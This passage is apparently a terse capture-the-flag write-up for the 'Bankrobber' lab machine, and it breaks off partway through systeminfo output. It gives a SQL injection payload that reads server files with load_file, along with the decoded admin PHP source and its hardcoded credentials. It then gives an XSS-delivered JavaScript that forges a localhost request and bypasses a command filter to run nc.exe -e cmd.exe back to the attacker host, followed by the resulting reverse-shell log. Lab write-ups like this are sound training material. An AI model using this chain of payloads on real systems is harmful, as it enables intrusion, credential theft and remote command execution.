3 admin backdoorchecker.php
# running any command
ERROR:
It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.
# file being requested is
/admin/backdoorchecker.php
# using SQLi to read it.
1' UNION SELECT 1,TO_BASE64(load_file('C:\\xampp\\htdocs\\admin\\backdoorchecker.php')),3; -- -
# decoded b64
<?php
include('../link.php');
include('auth.php');
$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad = array('$(','&');
$good = "ls";
if(strtolower(substr(PHP_OS,0,3)) == "win"){
$good = "dir";
}
if($username == "admin" && $password == "Hopelessromantic"){
if(isset($_POST['cmd'])){
// FILTER ESCAPE CHARS
foreach($bad as $char){
if(strpos($_POST['cmd'],$char) !== false){
die("You're not allowed to do that.");
}
}
// CHECK IF THE FIRST 2 CHARS ARE LS
if(substr($_POST['cmd'], 0,strlen($good)) != $good){
die("It's only allowed to use the $good command");
}
if($_SERVER['REMOTE_ADDR'] == "::1"){
system($_POST['cmd']);
} else{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}
}
} else{
echo "You are not allowed to use this function!";
}
?>
# notes:
1. user:pass is checked for admin:Hopelessromantic
2. filters out badchars => $( and &
3. does not like ls in the start of command
4. expect the command to run from localhost
# we can use the initial XSS exploit to call this locally.
<script src="http://10.10.16.7/kashz.js"> </script>
$ cat xss.js
var request = new XMLHttpRequest();
var uri = 'http://localhost/admin/backdoorchecker.php'
var c = 'id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D'
var params = 'cmd=dir|//10.10.16.7/drive/nc.exe -e cmd.exe 10.10.16.7 6969';
request.open('POST', uri, true);
request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
request.setRequestHeader('Cookie', c);
request.send(params);
# transfer with comment
<script src='http://10.10.16.7/xss.js'> </script>
# start smbserver and listener
$ nc -lvnp 6969 130 ⨯
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.154] 51127
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. Alle rechten voorbehouden.
C:\xampp\htdocs\admin>whoami
bankrobber\cortin
C:\xampp\htdocs\admin>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ===================================== ========
SeShutdownPrivilege Systeem afsluiten Disabled
SeChangeNotifyPrivilege Controle op bladeren negeren Enabled
SeUndockPrivilege Computer uit basisstation verwijderen Disabled
SeIncreaseWorkingSetPrivilege Een proceswerkset vergroten Disabled
SeTimeZonePrivilege Tijdzone wijzigen Disabled
C:\xampp\htdocs\admin>systeminfo
Host Name: BANKROBBER
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.14393 N/A Build 14393
System Type: x64-based PC
Hotfix(s): N/A
Last updated